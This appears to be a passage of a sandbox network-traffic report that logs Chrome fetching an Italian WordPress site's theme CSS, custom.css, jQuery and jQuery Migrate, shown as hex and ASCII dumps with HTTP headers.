                                                                                                                                              Data Ascii: ::-moz-selection{background-color: #c99c66;color: #ffffff;}::selection{background-color: #c99c66;color: #ffffff;}html.html_boxed {background: #eeeeee top left no-repeat scroll;}.socket_color, .socket_color div, .socket_color header, .socket_color m
                                                                                                                                              2025-01-03 16:32:59 UTC16384INData Raw: 27 6e 75 6d 62 65 72 27 5d 2c 20 23 74 6f 70 20 2e 73 6f 63 6b 65 74 5f 63 6f 6c 6f 72 20 69 6e 70 75 74 5b 74 79 70 65 3d 27 75 72 6c 27 5d 2c 20 23 74 6f 70 20 2e 73 6f 63 6b 65 74 5f 63 6f 6c 6f 72 20 69 6e 70 75 74 5b 74 79 70 65 3d 27 74 65 6c 27 5d 2c 20 23 74 6f 70 20 2e 73 6f 63 6b 65 74 5f 63 6f 6c 6f 72 20 69 6e 70 75 74 5b 74 79 70 65 3d 27 73 65 61 72 63 68 27 5d 2c 20 23 74 6f 70 20 2e 73 6f 63 6b 65 74 5f 63 6f 6c 6f 72 20 74 65 78 74 61 72 65 61 2c 20 23 74 6f 70 20 2e 73 6f 63 6b 65 74 5f 63 6f 6c 6f 72 20 73 65 6c 65 63 74 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 65 31 65 31 65 31 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 38 66 38 66 38 3b 63 6f 6c 6f 72 3a 23 37 31 39 34 33 30 3b 7d 23 74 6f 70 20 2e 73 6f 63 6b
                                                                                                                                              Data Ascii: 'number'], #top .socket_color input[type='url'], #top .socket_color input[type='tel'], #top .socket_color input[type='search'], #top .socket_color textarea, #top .socket_color select{border-color:#e1e1e1;background-color: #f8f8f8;color:#719430;}#top .sock
                                                                                                                                              2025-01-03 16:32:59 UTC16384INData Raw: 6d 69 74 27 5d 3a 68 6f 76 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 63 65 39 64 39 3b 63 6f 6c 6f 72 3a 23 37 37 34 32 31 37 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 64 61 63 37 62 37 3b 7d 2e 66 6f 6f 74 65 72 5f 63 6f 6c 6f 72 20 2e 61 76 69 61 2d 74 6f 63 2d 73 74 79 6c 65 2d 65 6c 65 67 61 6e 74 20 61 2e 61 76 69 61 2d 74 6f 63 2d 6c 65 76 65 6c 2d 30 3a 6c 61 73 74 2d 63 68 69 6c 64 3a 61 66 74 65 72 2c 20 2e 66 6f 6f 74 65 72 5f 63 6f 6c 6f 72 20 2e 61 76 69 61 2d 74 6f 63 2d 73 74 79 6c 65 2d 65 6c 65 67 61 6e 74 20 61 3a 66 69 72 73 74 2d 63 68 69 6c 64 3a 61 66 74 65 72 2c 20 2e 66 6f 6f 74 65 72 5f 63 6f 6c 6f 72 20 2e 61 76 69 61 2d 74 6f 63 2d 73 74 79 6c 65 2d 65 6c 65 67 61 6e 74 20 61 2e 61 76 69 61 2d 74 6f
                                                                                                                                              Data Ascii: mit']:hover{background-color: #fce9d9;color:#774217;border-color:#dac7b7;}.footer_color .avia-toc-style-elegant a.avia-toc-level-0:last-child:after, .footer_color .avia-toc-style-elegant a:first-child:after, .footer_color .avia-toc-style-elegant a.avia-to
                                                                                                                                              2025-01-03 16:32:59 UTC16384INData Raw: 61 6c 74 65 72 6e 61 74 65 5f 63 6f 6c 6f 72 20 75 6c 2c 20 2e 61 6c 74 65 72 6e 61 74 65 5f 63 6f 6c 6f 72 20 6c 69 2c 20 2e 61 6c 74 65 72 6e 61 74 65 5f 63 6f 6c 6f 72 20 66 69 65 6c 64 73 65 74 2c 20 2e 61 6c 74 65 72 6e 61 74 65 5f 63 6f 6c 6f 72 20 66 6f 72 6d 2c 20 2e 61 6c 74 65 72 6e 61 74 65 5f 63 6f 6c 6f 72 20 6c 61 62 65 6c 2c 20 2e 61 6c 74 65 72 6e 61 74 65 5f 63 6f 6c 6f 72 20 6c 65 67 65 6e 64 2c 20 2e 61 6c 74 65 72 6e 61 74 65 5f 63 6f 6c 6f 72 20 74 61 62 6c 65 2c 20 2e 61 6c 74 65 72 6e 61 74 65 5f 63 6f 6c 6f 72 20 63 61 70 74 69 6f 6e 2c 20 2e 61 6c 74 65 72 6e 61 74 65 5f 63 6f 6c 6f 72 20 74 62 6f 64 79 2c 20 2e 61 6c 74 65 72 6e 61 74 65 5f 63 6f 6c 6f 72 20 74 66 6f 6f 74 2c 20 2e 61 6c 74 65 72 6e 61 74 65 5f 63 6f 6c 6f 72 20
                                                                                                                                              Data Ascii: alternate_color ul, .alternate_color li, .alternate_color fieldset, .alternate_color form, .alternate_color label, .alternate_color legend, .alternate_color table, .alternate_color caption, .alternate_color tbody, .alternate_color tfoot, .alternate_color
                                                                                                                                              2025-01-03 16:32:59 UTC16384INData Raw: 2e 69 6e 76 65 72 73 2d 63 6f 6c 6f 72 20 69 6e 70 75 74 5b 74 79 70 65 3d 27 6e 75 6d 62 65 72 27 5d 2c 20 23 74 6f 70 20 2e 61 6c 74 65 72 6e 61 74 65 5f 63 6f 6c 6f 72 20 2e 69 6e 76 65 72 73 2d 63 6f 6c 6f 72 20 69 6e 70 75 74 5b 74 79 70 65 3d 27 75 72 6c 27 5d 2c 20 23 74 6f 70 20 2e 61 6c 74 65 72 6e 61 74 65 5f 63 6f 6c 6f 72 20 2e 69 6e 76 65 72 73 2d 63 6f 6c 6f 72 20 69 6e 70 75 74 5b 74 79 70 65 3d 27 74 65 6c 27 5d 2c 20 23 74 6f 70 20 2e 61 6c 74 65 72 6e 61 74 65 5f 63 6f 6c 6f 72 20 2e 69 6e 76 65 72 73 2d 63 6f 6c 6f 72 20 69 6e 70 75 74 5b 74 79 70 65 3d 27 73 65 61 72 63 68 27 5d 2c 20 23 74 6f 70 20 2e 61 6c 74 65 72 6e 61 74 65 5f 63 6f 6c 6f 72 20 2e 69 6e 76 65 72 73 2d 63 6f 6c 6f 72 20 74 65 78 74 61 72 65 61 2c 20 23 74 6f 70 20
                                                                                                                                              Data Ascii: .invers-color input[type='number'], #top .alternate_color .invers-color input[type='url'], #top .alternate_color .invers-color input[type='tel'], #top .alternate_color .invers-color input[type='search'], #top .alternate_color .invers-color textarea, #top
                                                                                                                                              2025-01-03 16:32:59 UTC16384INData Raw: 20 23 66 66 66 66 66 66 3b 7d 2e 6d 61 69 6e 5f 63 6f 6c 6f 72 20 2e 61 76 69 61 2d 74 6f 63 2d 73 74 79 6c 65 2d 65 6c 65 67 61 6e 74 20 61 3a 6c 61 73 74 2d 63 68 69 6c 64 3a 61 66 74 65 72 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 66 66 66 3b 7d 2e 6d 61 69 6e 5f 63 6f 6c 6f 72 20 2e 74 69 6d 65 6c 69 6e 65 2d 62 75 6c 6c 65 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 66 66 66 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 7d 2e 6d 61 69 6e 5f 63 6f 6c 6f 72 20 74 61 62 6c 65 2c 20 2e 6d 61 69 6e 5f 63 6f 6c 6f 72 20 2e 77 69 64 67 65 74 5f 6e 61 76 5f 6d 65 6e 75 20 75 6c 3a 66 69 72 73 74 2d 63 68 69 6c 64 3e 2e 63 75 72 72 65 6e 74 2d 6d 65 6e 75 2d 69 74 65 6d 2c 20 2e 6d 61
                                                                                                                                              Data Ascii: #ffffff;}.main_color .avia-toc-style-elegant a:last-child:after{ background-color:#ffffff;}.main_color .timeline-bullet{background-color:#ffffff;border-color: #ffffff;}.main_color table, .main_color .widget_nav_menu ul:first-child>.current-menu-item, .ma
                                                                                                                                              2025-01-03 16:33:00 UTC16384INData Raw: 68 65 61 64 65 72 5f 63 6f 6c 6f 72 20 66 6f 72 6d 2c 20 2e 68 65 61 64 65 72 5f 63 6f 6c 6f 72 20 6c 61 62 65 6c 2c 20 2e 68 65 61 64 65 72 5f 63 6f 6c 6f 72 20 6c 65 67 65 6e 64 2c 20 2e 68 65 61 64 65 72 5f 63 6f 6c 6f 72 20 74 61 62 6c 65 2c 20 2e 68 65 61 64 65 72 5f 63 6f 6c 6f 72 20 63 61 70 74 69 6f 6e 2c 20 2e 68 65 61 64 65 72 5f 63 6f 6c 6f 72 20 74 62 6f 64 79 2c 20 2e 68 65 61 64 65 72 5f 63 6f 6c 6f 72 20 74 66 6f 6f 74 2c 20 2e 68 65 61 64 65 72 5f 63 6f 6c 6f 72 20 74 68 65 61 64 2c 20 2e 68 65 61 64 65 72 5f 63 6f 6c 6f 72 20 74 72 2c 20 2e 68 65 61 64 65 72 5f 63 6f 6c 6f 72 20 74 68 2c 20 2e 68 65 61 64 65 72 5f 63 6f 6c 6f 72 20 74 64 2c 20 2e 68 65 61 64 65 72 5f 63 6f 6c 6f 72 20 61 72 74 69 63 6c 65 2c 20 2e 68 65 61 64 65 72 5f 63
                                                                                                                                              Data Ascii: header_color form, .header_color label, .header_color legend, .header_color table, .header_color caption, .header_color tbody, .header_color tfoot, .header_color thead, .header_color tr, .header_color th, .header_color td, .header_color article, .header_c
                                                                                                                                              2025-01-03 16:33:00 UTC16384INData Raw: 6e 73 69 76 65 2e 6a 73 5f 61 63 74 69 76 65 20 23 74 6f 70 20 2e 68 65 61 64 65 72 5f 63 6f 6c 6f 72 20 2e 61 76 69 61 5f 63 6f 6d 62 6f 5f 77 69 64 67 65 74 20 2e 74 6f 70 5f 74 61 62 20 2e 74 61 62 7b 62 6f 72 64 65 72 2d 74 6f 70 2d 63 6f 6c 6f 72 3a 23 66 66 66 66 66 66 3b 7d 2e 68 65 61 64 65 72 5f 63 6f 6c 6f 72 20 2e 74 65 6d 70 6c 61 74 65 2d 61 72 63 68 69 76 65 73 20 20 2e 74 61 62 63 6f 6e 74 61 69 6e 65 72 20 61 2c 20 23 74 6f 70 20 2e 68 65 61 64 65 72 5f 63 6f 6c 6f 72 20 2e 74 61 62 63 6f 6e 74 61 69 6e 65 72 20 2e 74 61 62 3a 68 6f 76 65 72 2c 20 23 74 6f 70 20 2e 68 65 61 64 65 72 5f 63 6f 6c 6f 72 20 2e 74 61 62 63 6f 6e 74 61 69 6e 65 72 20 2e 74 61 62 2e 61 63 74 69 76 65 5f 74 61 62 7b 63 6f 6c 6f 72 3a 23 63 39 39 63 36 36 3b 7d 20
                                                                                                                                              Data Ascii: nsive.js_active #top .header_color .avia_combo_widget .top_tab .tab{border-top-color:#ffffff;}.header_color .template-archives .tabcontainer a, #top .header_color .tabcontainer .tab:hover, #top .header_color .tabcontainer .tab.active_tab{color:#c99c66;}
                                                                                                                                              2025-01-03 16:33:00 UTC16384INData Raw: 23 74 6f 70 20 2e 77 63 2d 62 6f 6f 6b 69 6e 67 73 2d 62 6f 6f 6b 69 6e 67 2d 66 6f 72 6d 20 2e 62 6c 6f 63 6b 55 49 2e 62 6c 6f 63 6b 4f 76 65 72 6c 61 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 23 74 6f 70 20 2e 73 6f 63 6b 65 74 5f 63 6f 6c 6f 72 20 2e 77 63 2d 62 6f 6f 6b 69 6e 67 73 2d 64 61 74 65 2d 70 69 63 6b 65 72 20 2e 75 69 2d 64 61 74 65 70 69 63 6b 65 72 20 74 64 2e 62 6f 6f 6b 61 62 6c 65 2d 72 61 6e 67 65 20 2e 75 69 2d 73 74 61 74 65 2d 64 65 66 61 75 6c 74 2c 20 23 74 6f 70 20 2e 73 6f 63 6b 65 74 5f 63 6f 6c 6f 72 20 2e 77 63 2d 62 6f 6f 6b 69 6e 67 73 2d 64 61 74 65 2d 70 69 63 6b 65 72 20 2e 75 69 2d 64 61 74 65 70 69 63 6b 65 72 20 74 64 2e 75 69 2d 64 61 74
                                                                                                                                              Data Ascii: #top .wc-bookings-booking-form .blockUI.blockOverlay{background-color: #ffffff !important;}#top .socket_color .wc-bookings-date-picker .ui-datepicker td.bookable-range .ui-state-default, #top .socket_color .wc-bookings-date-picker .ui-datepicker td.ui-dat
                                                                                                                                              2025-01-03 16:33:00 UTC16003INData Raw: 72 5f 70 72 6f 64 75 63 74 5f 68 65 61 64 65 72 2c 20 2e 6d 61 69 6e 5f 63 6f 6c 6f 72 20 2e 61 76 69 61 2d 61 72 72 6f 77 2c 20 23 74 6f 70 20 2e 6d 61 69 6e 5f 63 6f 6c 6f 72 20 2e 76 61 72 69 61 74 69 6f 6e 73 20 73 65 6c 65 63 74 2c 20 23 74 6f 70 20 2e 6d 61 69 6e 5f 63 6f 6c 6f 72 20 2e 76 61 72 69 61 74 69 6f 6e 73 20 69 6e 70 75 74 2c 20 23 74 6f 70 20 2e 6d 61 69 6e 5f 63 6f 6c 6f 72 20 23 72 65 76 69 65 77 73 20 69 6e 70 75 74 5b 74 79 70 65 3d 27 74 65 78 74 27 5d 2c 20 23 74 6f 70 20 2e 6d 61 69 6e 5f 63 6f 6c 6f 72 20 23 72 65 76 69 65 77 73 20 69 6e 70 75 74 5b 74 79 70 65 3d 27 65 6d 61 69 6c 27 5d 2c 20 2e 6d 61 69 6e 5f 63 6f 6c 6f 72 20 23 72 65 76 69 65 77 73 20 2e 63 6f 6d 6d 65 6e 74 2d 74 65 78 74 2c 20 2e 6d 61 69 6e 5f 63 6f 6c 6f
                                                                                                                                              Data Ascii: r_product_header, .main_color .avia-arrow, #top .main_color .variations select, #top .main_color .variations input, #top .main_color #reviews input[type='text'], #top .main_color #reviews input[type='email'], .main_color #reviews .comment-text, .main_colo


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              63192.168.2.164978389.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:32:59 UTC586OUTGET /wp-content/themes/enfold/css/custom.css?ver=4.5 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                              Referer: https://www.cipassoitalia.it/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2025-01-03 16:32:59 UTC291INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:32:59 GMT
                                                                                                                                              Content-Type: text/css
                                                                                                                                              Content-Length: 707
                                                                                                                                              Connection: close
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              Last-Modified: Mon, 18 Mar 2019 15:16:34 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:32:59 UTC707INData Raw: 2f 2a 20 48 61 76 65 20 66 75 6e 20 61 64 64 69 6e 67 20 79 6f 75 72 20 73 74 79 6c 65 20 68 65 72 65 20 3a 29 20 2d 20 50 53 3a 20 41 74 20 61 6c 6c 20 74 69 6d 65 73 20 74 68 69 73 20 66 69 6c 65 20 73 68 6f 75 6c 64 20 63 6f 6e 74 61 69 6e 20 61 20 63 6f 6d 6d 65 6e 74 20 6f 72 20 61 20 72 75 6c 65 2c 20 6f 74 68 65 72 77 69 73 65 20 6f 70 65 72 61 20 6d 69 67 68 74 20 61 63 74 20 62 75 67 67 79 20 3a 28 20 2a 2f 0a 0a 2f 2a 20 47 65 6e 65 72 61 6c 20 43 75 73 74 6f 6d 20 43 53 53 20 2a 2f 0a 0a 0a 0a 0a 2f 2a 0a 44 65 73 6b 74 6f 70 20 53 74 79 6c 65 73 0a 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 20 2a 2f 0a 2f 2a 20 4e 6f 74 65 3a 20 41 64 64
                                                                                                                                              Data Ascii: /* Have fun adding your style here :) - PS: At all times this file should contain a comment or a rule, otherwise opera might act buggy :( *//* General Custom CSS *//*Desktop Styles================================================== *//* Note: Add


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              64192.168.2.164978589.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:32:59 UTC570OUTGET /wp-includes/js/jquery/jquery.min.js?ver=3.6.0 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                              Referer: https://www.cipassoitalia.it/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2025-01-03 16:33:00 UTC277INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:32:59 GMT
                                                                                                                                              Content-Type: text/javascript
                                                                                                                                              Content-Length: 89521
                                                                                                                                              Connection: close
                                                                                                                                              Last-Modified: Sun, 11 Sep 2022 14:12:18 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:33:00 UTC16107INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                                                                                              Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                                                                                              2025-01-03 16:33:00 UTC16384INData Raw: 6c 3d 22 6f 6e 6c 79 22 3d 3d 3d 68 26 26 21 75 26 26 22 6e 65 78 74 53 69 62 6c 69 6e 67 22 7d 72 65 74 75 72 6e 21 30 7d 69 66 28 75 3d 5b 6d 3f 63 2e 66 69 72 73 74 43 68 69 6c 64 3a 63 2e 6c 61 73 74 43 68 69 6c 64 5d 2c 6d 26 26 70 29 7b 64 3d 28 73 3d 28 72 3d 28 69 3d 28 6f 3d 28 61 3d 63 29 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c 7c 28 6f 5b 61 2e 75 6e 69 71 75 65 49 44 5d 3d 7b 7d 29 29 5b 68 5d 7c 7c 5b 5d 29 5b 30 5d 3d 3d 3d 6b 26 26 72 5b 31 5d 29 26 26 72 5b 32 5d 2c 61 3d 73 26 26 63 2e 63 68 69 6c 64 4e 6f 64 65 73 5b 73 5d 3b 77 68 69 6c 65 28 61 3d 2b 2b 73 26 26 61 26 26 61 5b 6c 5d 7c 7c 28 64 3d 73 3d 30 29 7c 7c 75 2e 70 6f 70 28 29 29 69 66 28 31 3d 3d 3d 61 2e 6e 6f 64 65 54 79 70 65 26
                                                                                                                                              Data Ascii: l="only"===h&&!u&&"nextSibling"}return!0}if(u=[m?c.firstChild:c.lastChild],m&&p){d=(s=(r=(i=(o=(a=c)[S]||(a[S]={}))[a.uniqueID]||(o[a.uniqueID]={}))[h]||[])[0]===k&&r[1])&&r[2],a=s&&c.childNodes[s];while(a=++s&&a&&a[l]||(d=s=0)||u.pop())if(1===a.nodeType&
                                                                                                                                              2025-01-03 16:33:00 UTC16384INData Raw: 6d 28 72 29 7c 7c 28 61 3d 21 30 29 2c 6c 26 26 28 61 3f 28 74 2e 63 61 6c 6c 28 65 2c 72 29 2c 74 3d 6e 75 6c 6c 29 3a 28 6c 3d 74 2c 74 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 72 65 74 75 72 6e 20 6c 2e 63 61 6c 6c 28 53 28 65 29 2c 6e 29 7d 29 29 2c 74 29 29 66 6f 72 28 3b 73 3c 75 3b 73 2b 2b 29 74 28 65 5b 73 5d 2c 6e 2c 61 3f 72 3a 72 2e 63 61 6c 6c 28 65 5b 73 5d 2c 73 2c 74 28 65 5b 73 5d 2c 6e 29 29 29 3b 72 65 74 75 72 6e 20 69 3f 65 3a 6c 3f 74 2e 63 61 6c 6c 28 65 29 3a 75 3f 74 28 65 5b 30 5d 2c 6e 29 3a 6f 7d 2c 5f 3d 2f 5e 2d 6d 73 2d 2f 2c 7a 3d 2f 2d 28 5b 61 2d 7a 5d 29 2f 67 3b 66 75 6e 63 74 69 6f 6e 20 55 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 74 2e 74 6f 55 70 70 65 72 43 61 73 65 28 29 7d 66 75 6e 63 74 69 6f 6e 20 58 28
                                                                                                                                              Data Ascii: m(r)||(a=!0),l&&(a?(t.call(e,r),t=null):(l=t,t=function(e,t,n){return l.call(S(e),n)})),t))for(;s<u;s++)t(e[s],n,a?r:r.call(e[s],s,t(e[s],n)));return i?e:l?t.call(e):u?t(e[0],n):o},_=/^-ms-/,z=/-([a-z])/g;function U(e,t){return t.toUpperCase()}function X(
                                                                                                                                              2025-01-03 16:33:00 UTC16384INData Raw: 6f 63 28 65 29 29 29 66 6f 72 28 61 3d 76 65 28 63 29 2c 72 3d 30 2c 69 3d 28 6f 3d 76 65 28 65 29 29 2e 6c 65 6e 67 74 68 3b 72 3c 69 3b 72 2b 2b 29 73 3d 6f 5b 72 5d 2c 75 3d 61 5b 72 5d 2c 76 6f 69 64 20 30 2c 22 69 6e 70 75 74 22 3d 3d 3d 28 6c 3d 75 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 26 26 70 65 2e 74 65 73 74 28 73 2e 74 79 70 65 29 3f 75 2e 63 68 65 63 6b 65 64 3d 73 2e 63 68 65 63 6b 65 64 3a 22 69 6e 70 75 74 22 21 3d 3d 6c 26 26 22 74 65 78 74 61 72 65 61 22 21 3d 3d 6c 7c 7c 28 75 2e 64 65 66 61 75 6c 74 56 61 6c 75 65 3d 73 2e 64 65 66 61 75 6c 74 56 61 6c 75 65 29 3b 69 66 28 74 29 69 66 28 6e 29 66 6f 72 28 6f 3d 6f 7c 7c 76 65 28 65 29 2c 61 3d 61 7c 7c 76 65 28 63 29 2c 72 3d 30 2c 69 3d 6f 2e 6c 65 6e
                                                                                                                                              Data Ascii: oc(e)))for(a=ve(c),r=0,i=(o=ve(e)).length;r<i;r++)s=o[r],u=a[r],void 0,"input"===(l=u.nodeName.toLowerCase())&&pe.test(s.type)?u.checked=s.checked:"input"!==l&&"textarea"!==l||(u.defaultValue=s.defaultValue);if(t)if(n)for(o=o||ve(e),a=a||ve(c),r=0,i=o.len
                                                                                                                                              2025-01-03 16:33:00 UTC16384INData Raw: 2e 73 65 6c 65 63 74 65 64 2c 28 74 74 3d 45 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 6e 70 75 74 22 29 29 2e 76 61 6c 75 65 3d 22 74 22 2c 74 74 2e 74 79 70 65 3d 22 72 61 64 69 6f 22 2c 79 2e 72 61 64 69 6f 56 61 6c 75 65 3d 22 74 22 3d 3d 3d 74 74 2e 76 61 6c 75 65 3b 76 61 72 20 63 74 2c 66 74 3d 53 2e 65 78 70 72 2e 61 74 74 72 48 61 6e 64 6c 65 3b 53 2e 66 6e 2e 65 78 74 65 6e 64 28 7b 61 74 74 72 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 24 28 74 68 69 73 2c 53 2e 61 74 74 72 2c 65 2c 74 2c 31 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 29 7d 2c 72 65 6d 6f 76 65 41 74 74 72 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 53 2e 72 65
                                                                                                                                              Data Ascii: .selected,(tt=E.createElement("input")).value="t",tt.type="radio",y.radioValue="t"===tt.value;var ct,ft=S.expr.attrHandle;S.fn.extend({attr:function(e,t){return $(this,S.attr,e,t,1<arguments.length)},removeAttr:function(e){return this.each(function(){S.re


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              65192.168.2.164978689.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:32:59 UTC578OUTGET /wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                              Referer: https://www.cipassoitalia.it/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2025-01-03 16:33:00 UTC277INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:32:59 GMT
                                                                                                                                              Content-Type: text/javascript
                                                                                                                                              Content-Length: 11224
                                                                                                                                              Connection: close
                                                                                                                                              Last-Modified: Thu, 11 Feb 2021 13:25:28 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:33:00 UTC11224INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 4d 69 67 72 61 74 65 20 76 33 2e 33 2e 32 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 6a 51 75 65 72 79 2e 6d 69 67 72 61 74 65 4d 75 74 65 26 26 28 6a 51 75 65 72 79 2e 6d 69 67 72 61 74 65 4d 75 74 65 3d 21 30 29 2c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 22 6a 71 75 65 72 79 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72
